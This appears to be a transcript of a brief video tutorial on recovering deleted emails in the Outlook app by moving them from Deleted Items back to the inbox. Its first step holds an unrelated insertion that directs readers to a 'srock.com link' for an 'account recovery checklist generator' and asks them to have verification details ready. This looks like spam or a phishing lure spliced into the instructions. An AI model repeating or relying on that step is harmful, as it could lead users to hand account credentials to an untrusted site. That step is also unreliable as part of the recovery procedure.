I hit this issue today and here is the quick fix to solve it. If you've accidentally deleted important emails in the Outlook app, don't worry, there is a way to recover them. Follow these steps to get your emails back. Step 1. Open the Outlook app. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Go to the deleted items folder. Navigate to the deleted items folder in your mailbox. This folder contains emails that you've recently deleted. Step 3. Select the emails to recover. Browse through the emails in the deleted items folder. Tap and hold on the emails you want to recover to select them. Step 4. Move emails to inbox. After selecting the emails, look for the move option at the bottom of the screen. Choose move to inbox to restore the emails to your main inbox. Step 5. Check the inbox. Go back to your inbox to ensure the emails have been successfully restored. If you don't see them, you may need to refresh the app. Sometimes, emails may not appear immediately after recovery, so refreshing the app can help. If you follow these steps, you should be able to recover your deleted emails easily. Good luck and happy emailing.